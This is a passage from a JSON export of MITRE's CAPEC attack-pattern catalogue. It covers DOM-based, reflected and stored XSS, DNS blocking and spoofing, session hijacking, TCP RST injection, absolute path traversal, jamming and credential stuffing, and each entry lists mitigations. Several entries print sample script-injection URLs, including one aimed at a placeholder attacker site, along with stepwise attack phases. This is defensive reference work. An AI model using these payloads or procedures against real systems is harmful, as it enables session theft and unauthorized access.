produced within client-site scripts manipulating the DOM.","Ensure that all user-supplied input is validated before use."]},"Example_Instances":{"Example":[{"p":["Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.","The application\u2019s client-side code may want to print this mode value to the screen to give the users an understanding of what mode they are in. In this example, JavaScript is used to pull the value from the URL and update the HTML by dynamically manipulating the DOM via a document.write() call.","Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim\u2019s browser:"],"div":["http://my.site.com/aform.html?mode=full",{"style":"margin-left:10px;","class":"informative"},"<script>document.write(\\"<p>Mode is: \\" + document.location.href.substring(document.location.href.indexOf(\'mode=\') + 5) + \\"</p>\\");<\/script>",{"style":"margin-left:10px;","class":"informative"},"http://my.site.com/aform.html?mode=<script>alert(\'hi\');<\/script>",{"style":"margin-left:10px;","class":"attack"}]},{"p":["In some DOM-based attacks, the malicious script never gets sent to the web server at all, thus bypassing any server-side protections that might be in place. Consider the previously used web application that displays the mode value. Since the HTML is being generated dynamically through DOM manipulations, a URL fragment (i.e., the part of a URL after the \'#\' character) can be used.","In this variation of a DOM-based XSS attack, the malicious script will not be sent to the web server, but will instead be managed by the victim\'s browser and is still available to the client-side script code."],"div":["http://my.site.com/aform.html#mode=<script>alert(\'hi\')<\/script>",{"style":"margin-left:10px;","class":"attack"}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"79"},{"CWE_ID":"20"},{"CWE_ID":"83"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Reflected DOM Injection"}},"References":{"Reference":[{"External_Reference_ID":"REF-471"},{"External_Reference_ID":"REF-472"},{"External_Reference_ID":"REF-618","Section":"Testing for DOM Based Cross Site Scripting"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2017-04-15"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"}]}},"589":{"ID":"589","Name":"DNS Blocking","Abstraction":"Detailed","Status":"Draft","Description":"An adversary intercepts traffic and intentionally drops DNS requests based on content in the request. In this way, the adversary can deny the availability of specific services or content to the user even if the IP address is changed.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"603","Exclude_Related":{"Exclude_ID":"514"}}},"Prerequisites":{"Prerequisite":"This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"Preventing DNS from resolving a request denies the availability of a target site or service for the user."}},"Mitigations":{"Mitigation":["Hard Coded Alternate DNS server in applications","Avoid dependence on DNS","Include \\"hosts file\\"/IP address in the application.","Ensure best practices with respect to communications channel protections.","Use a .onion domain with Tor support"]},"Example_Instances":{"Example":{"p":["Full URL Based Filtering: Filtering based upon the requested URL.","URL String-based Filtering: Filtering based upon the use of particular strings included in the requested URL."]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"300"}},"References":{"Reference":{"External_Reference_ID":"REF-473"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-12"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"590":{"ID":"590","Name":"IP Address Blocking","Abstraction":"Detailed","Status":"Draft","Description":"An adversary performing this type of attack drops packets destined for a target IP address. The aim is to prevent access to the service hosted at the target IP address.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"603","Exclude_Related":{"Exclude_ID":"514"}}},"Prerequisites":{"Prerequisite":"This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"Blocking packets intended for a target IP address denies its availability to the user."}},"Mitigations":{"Mitigation":"Have a large pool of backup IPs built into the application and support proxy capability in the application."},"Example_Instances":{"Example":"Consider situations of information censorship for political purposes, where regimes that prevent access to specific web services."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"300"}},"References":{"Reference":{"External_Reference_ID":"REF-475"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-12"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Vulnerabilities"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"}]}},"591":{"ID":"591","Name":"Reflected XSS","Abstraction":"Detailed","Status":"Stable","Description":"This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is \\"reflected\\" off a vulnerable web application and then executed by a victim\'s browser. The process starts with an adversary delivering a malicious script to a victim and convincing the victim to send the script to the vulnerable web application. The most common method of this is through a phishing email where the adversary embeds the malicious script with a URL that the victim then clicks on. In processing the subsequent request, the vulnerable web application incorrectly considers the malicious script as valid input and uses it to creates a reposnse that is then sent back to the victim. To launch a successful Reflected XSS attack, an adversary looks for places where user-input is used directly in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (<img>), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"63"}},"Prerequisites":{"Prerequisite":["An application that leverages a client-side web browser with scripting enabled.","An application that fail to adequately sanitize or encode untrusted input."]},"Skills_Required":{"Skill":["Requires the ability to write malicious scripts and embed them into HTTP requests.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data","Note":"A successful Reflected XSS attack can enable an adversary to exfiltrate sensitive information from the application."},{"Scope":["Confidentiality","Authorization","Access Control"],"Impact":"Gain Privileges","Note":"A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access."},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application."},{"Scope":"Integrity","Impact":"Modify Data","Note":"A successful Reflected attack can allow an adversary to tamper with application data."}]},"Mitigations":{"Mitigation":["Use browser technologies that do not allow client-side scripting.","Utilize strict type, character, and encoding enforcement.","Ensure that all user-supplied input is validated before use."]},"Example_Instances":{"Example":[{"p":["Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.","The application\u2019s server-side code may want to display this mode value in the HTML page being created to give the users an understanding of what mode they are in. In this example, PHP is used to pull the value from the URL and generate the desired HTML.","Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim\u2019s browser:"],"div":["http://my.site.com/aform.html?mode=full",{"style":"margin-left:10px;","class":"informative"},"<?php",{"style":"margin-left:10px;","class":"informative"},"http://my.site.com/aform.html?mode=<script>alert(\'hi\');<\/script>",{"style":"margin-left:10px;","class":"attack"}]},{"p":["Reflected XSS attacks can take advantage of HTTP headers to compromise a victim. For example, assume a vulnerable web application called \u2018mysite\u2019 dynamically generates a link using an HTTP header such as HTTP_REFERER. Code somewhere in the application could look like:","The HTTP_REFERER header is populated with the URI that linked to the currently executing page. A web site can be created and hosted by an adversary that takes advantage of this by adding a reference to the vulnerable web application. By tricking a victim into clicking a link that executes the attacker\u2019s web page, such as:","The vulnerable web application (\'mysite\') is now called via the attacker\'s web site, initiated by the victim\'s web browser. The HTTP_REFERER header will contain a malicious script, which is embedded into the page by the vulnerable application and served to the victim. The victim\u2019s web browser then executes the injected script, thus compromising the victim\u2019s machine."],"div":["<?php",{"style":"margin-left:10px;","class":"informative"},"\\"http://attackerswebsite.com?<script>malicious content<\/script>\\"",{"style":"margin-left:10px;","class":"attack"}]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"79"}},"References":{"Reference":[{"External_Reference_ID":"REF-476"},{"External_Reference_ID":"REF-604","Section":"Testing for Reflected Cross Site Scripting"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2017-04-15"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description, Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"}]}},"592":{"ID":"592","Name":"Stored XSS","Abstraction":"Detailed","Status":"Stable","Description":"This type of attack is a form of Cross-site Scripting (XSS) where a malicious script is persistenly \\"stored\\" within the data storage of a vulnerable web application. Initially presented by an adversary to the vulnerable web application, the malicious script is incorrectly considered valid input and is not properly encoded by the web application. A victim is then convinced to use the web application in a way that creates a response that includes the malicious script. This response is subsequently sent to the victim and the malicious script is executed by the victim\'s browser. To launch a successful Stored XSS attack, an adversary looks for places where stored input data is used in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (<img>), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"63"}},"Prerequisites":{"Prerequisite":["An application that leverages a client-side web browser with scripting enabled.","An application that fails to adequately sanitize or encode untrusted input.","An application that stores information provided by the user in data storage of some kind."]},"Skills_Required":{"Skill":["Requires the ability to write scripts of varying complexity and to inject them through user controlled fields within the application.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data","Note":"A successful Stored XSS attack can enable an adversary to exfiltrate sensitive information from the application."},{"Scope":["Confidentiality","Authorization","Access Control"],"Impact":"Gain Privileges","Note":"A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access."},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application."},{"Scope":"Integrity","Impact":"Modify Data","Note":"A successful Stored XSS attack can allow an adversary to tamper with application data."}]},"Mitigations":{"Mitigation":["Use browser technologies that do not allow client-side scripting.","Utilize strict type, character, and encoding enforcement.","Ensure that all user-supplied input is validated before being stored."]},"Example_Instances":{"Example":["An adversary determines that a system uses a web based interface for administration. The adversary creates a new user record and supplies a malicious script in the user name field. The user name field is not validated by the system and a new log entry is created detailing the creation of the new user. Later, an administrator reviews the log in the administrative console. When the administrator comes across the new user entry, the browser sees a script and executes it, stealing the administrator\'s authentication cookie and forwarding it to the adversary. An adversary then uses the received authentication cookie to log in to the system as an administrator, provided that the administrator console can be accessed remotely.","An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. An adversary embeds JavaScript in the image tags of their message. The adversary then sends the victim an email advertising free goods and provides a link to the form for how to collect. When the victim visits the forum and reads the message, the malicious script is executed within the victim\'s browser."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"79"}},"References":{"Reference":{"External_Reference_ID":"REF-605","Section":"Testing for Stored Cross Site Scripting"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2017-04-15"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"}]}},"593":{"ID":"593","Name":"Session Hijacking","Abstraction":"Standard","Status":"Stable","Description":"This type of attack involves an adversary that exploits weaknesses in an application\'s use of sessions in performing authentication. The adversary is able to steal or manipulate an active session and use it to gain unathorized access to the application.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"21"}},"Prerequisites":{"Prerequisite":"An application that leverages sessions to perform authentication."},"Skills_Required":{"Skill":["Exploiting a poorly protected identity token is a well understood attack with many helpful resources available.",{"Level":"Low"}]},"Resources_Required":{"Resource":"The adversary must have the ability to communicate with the application over the network."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Gain Privileges","Note":"A successful attack can enable an adversary to gain unauthorized access to an application."}},"Mitigations":{"Mitigation":"Properly encrypt and sign identity tokens in transit, and use industry standard session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf. Utilize a session timeout for all sessions. If the user does not explicitly logout, terminate their session after this period of inactivity. If the user logs back in then a new session key should be generated."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"287"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1550.001","Entry_Name":"Use Alternate Authentication Material:Application Access Token"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1563","Entry_Name":"Remote Service Session Hijacking"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Session hijacking attack"}]},"References":{"Reference":{"External_Reference_ID":"REF-603","Section":"Testing for Session Hijacking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2017-04-15"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Examples-Instances, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"594":{"ID":"594","Name":"Traffic Injection","Abstraction":"Meta","Status":"Stable","Description":"An adversary injects traffic into the target\'s network connection. The adversary is therefore able to degrade or disrupt the connection, and potentially modify the content. This is not a flooding attack, as the adversary is not focusing on exhausting resources. Instead, the adversary is crafting a specific input to affect the system in a particular way.","Prerequisites":{"Prerequisite":["The target application must leverage an open communications channel.","The channel on which the target communicates must be vulnerable to interception (e.g., adversary in the middle attack - CAPEC-94)."]},"Resources_Required":{"Resource":"A tool, such as a MITM Proxy, that is capable of generating and injecting custom inputs to be used in the attack."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution","Note":"The injection of specific content into a connection can trigger a disruption in that communications channel, thereby denying availability of the service."},{"Scope":"Integrity","Impact":"Other","Note":"An adversary\'s injection of additional content into a communication channel negatively impacts the integrity of that channel."}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"940"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-03"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Prerequisites"}]}},"595":{"ID":"595","Name":"Connection Reset","Abstraction":"Standard","Status":"Draft","Description":"In this attack pattern, an adversary injects a connection reset packet to one or both ends of a target\'s connection. The attacker is therefore able to have the target and/or the destination server sever the connection without having to directly filter the traffic between them.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"594"}},"Prerequisites":{"Prerequisite":"This attack requires the ability to monitor the target\'s network connection."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"940"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-04"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"596":{"ID":"596","Name":"TCP RST Injection","Abstraction":"Detailed","Status":"Draft","Description":"An adversary injects one or more TCP RST packets to a target after the target has made a HTTP GET request. The goal of this attack is to have the target and/or destination web server terminate the TCP connection.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"595"}},"Prerequisites":{"Prerequisite":"An On/In Path Device"},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"940"}},"References":{"Reference":{"External_Reference_ID":"REF-477"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-03"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"597":{"ID":"597","Name":"Absolute Path Traversal","Abstraction":"Detailed","Status":"Draft","Description":"An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as \\"..\\" to extend their range of access to inappropriate areas of the file system. The goal of the adversary is to access directories and files that are intended to be restricted from their access.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"126"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Fingerprinting of the operating system] In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.","Technique":["Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.","TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.","Induce errors to find informative error messages"]},{"Step":"2","Phase":"Explore","Description":"[Survey application] Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.","Technique":["Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore a website and analyze how it is constructed. Many browser\'s plug-in are available to facilitate the analysis or automate the URL discovery."]},{"Step":"3","Phase":"Experiment","Description":"[Attempt variations on input parameters] Using manual or automated means, an adversary attempts varying absolute file paths on all found user input locations and observes the responses.","Technique":["Access common files in root directories such as \\"/bin\\", \\"/boot\\", \\"/lib\\", or \\"/home\\"","Access a specific drive letter or windows volume letter by specifying \\"C:dirname\\" for example","Access a known Windows UNC share by specifying \\"\\\\\\\\UNC\\\\share\\\\name\\" for example"]},{"Step":"4","Phase":"Exploit","Description":"[Access, modify, or execute arbitrary files.] An adversary injects absolute path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.","Technique":["Manipulate file and its path by injecting absolute path sequences (e.g. \\"/home/file.txt\\").","Download files, modify files, or try to execute shell commands (with binary files)."]}]},"Prerequisites":{"Prerequisite":"The target must leverage and access an underlying file system."},"Skills_Required":{"Skill":["Simple command line attacks.",{"Level":"Low"},"Programming attacks.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The attacker must have access to an application interface or a direct shell that allows them to inject directory strings and monitor the results."},"Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Data","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Data","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"Unreliable Execution","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Mitigations":{"Mitigation":["Design: Configure the access control correctly.","Design: Enforce principle of least privilege.","Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.","Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement.","Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.","Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.","Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin.","Implementation: Perform input validation for all remote content, including remote and user-generated content.","Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.","Implementation: Use indirect references rather than actual file names.","Implementation: Use possible permissions on file access when developing and deploying web applications.","Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification using an allowlist approach."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"36"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2017-01-06"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"598":{"ID":"598","Name":"DNS Spoofing","Abstraction":"Detailed","Status":"Draft","Description":"An adversary sends a malicious (\\"NXDOMAIN\\" (\\"No such domain\\") code, or DNS A record) response to a targets route request before a legitimate resolver can. This technique requires an On-path or In-path device that can monitor and respond to the targets DNS requests. This attack differs from BGP Tampering in that it directly responds to requests made by the target instead of polluting the routing the targets infrastructure uses.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"194","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":"On/In Path Device"},"Skills_Required":{"Skill":["To distribute email",{"Level":"Low"}]},"Mitigations":{"Mitigation":["Design: Avoid dependence on DNS","Design: Include \\"hosts file\\"/IP address in the application","Implementation: Utilize a .onion domain with Tor support","Implementation: DNSSEC","Implementation: DNS-hold-open"]},"Example_Instances":{"Example":["Below-Recursive DNS Poisoning: When an On/In-path device between a recursive DNS server and a user sends a malicious (\\"NXDOMAIN\\" (\\"No such domain\\") code, or DNS A record ) response before a legitimate resolver can.","Above-Recursive DNS Poisoning: When an On/In-path device between an authority server (e.g., government-managed) and a recursive DNS server sends a malicious (\\"NXDOMAIN\\" (\\"No such domain\\")code, or a DNS record) response before a legitimate resolver can."]},"References":{"Reference":[{"External_Reference_ID":"REF-477"},{"External_Reference_ID":"REF-479"}]},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-04"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}}},"599":{"ID":"599","Name":"Terrestrial Jamming","Abstraction":"Detailed","Status":"Draft","Description":"In this attack pattern, the adversary transmits disruptive signals in the direction of the target consumer-level satellite dish (as opposed to the satellite itself). The transmission disruption occurs in a more targeted range. Portable terrestrial jammers have a range of 3-5 kilometers in urban areas and 20 kilometers in rural areas. This technique requires a terrestrial jammer that is more powerful than the frequencies sent from the satellite.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"195","Exclude_Related":{"Exclude_ID":"513"}}},"Resources_Required":{"Resource":{"p":["A terrestrial satellite jammer with a signal more powerful than that of the satellite attempting to communicate with the target.","The adversary must know the location of the target satellite dish."]}},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"A successful attack will deny, degrade, or disrupt availability of satellite communications for the target by overwhelming its resources to accurately receive authorized transmissions."}},"Example_Instances":{"Example":"An attempt to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These jamming signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary."},"References":{"Reference":{"External_Reference_ID":"REF-462"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-12"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}}},"600":{"ID":"600","Name":"Credential Stuffing","Abstraction":"Standard","Status":"Stable","Description":{"p":["An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services. Attacks of this kind often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications. The primary goal of Credential Stuffing is to achieve lateral movement and gain authenticated access to additional systems, applications, and/or services. A successfully executed Credential Stuffing attack could result in the adversary impersonating the victim or executing any action that the victim is authorized to perform. If the password obtained by the adversary is used for multiple systems, accounts, and/or services, this attack will be successful (in the absence of other mitigations).","Although not technically a brute force attack, Credential Stuffing attacks can function as such if an adversary possess multiple known passwords for the same user account. This may occur in the event where an adversary obtains user credentials from multiple sources or if the adversary obtains a user\'s password history for an account.","Credential Stuffing attacks are similar to Password Spraying attacks (CAPEC-565) regarding their targets and their overall goals. However, Password Spraying attacks do not have any insight into known username/password combinations and instead leverage common or expected passwords. This also means that Password Spraying attacks must avoid inducing account lockouts, which is generally not a worry of Credential Stuffing attacks. Password Spraying attacks may additionally lead to Credential Stuffing attacks, once a successful username/password combination is discovered."]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"560","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Acquire known credentials] The adversary must obtain known credentials in order to access the target system, application, or service.","Technique":["An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.","An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.","An adversary conducts a sniffing attack to steal credentials as they are transmitted.","An adversary gains access to a database and exfiltrates password hashes.","An adversary examines outward-facing configuration and properties files to discover hardcoded credentials."]},{"Step":"2","Phase":"Explore","Description":"[Determine target\'s password policy] Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.","Technique":["Determine minimum and maximum allowed password lengths.","Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).","Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account)."]},{"Step":"3","Phase":"Experiment","Description":"[Attempt authentication] Try each username/password combination until the target grants access.","Technique":"Manually or automatically enter each username/password combination through the target\'s 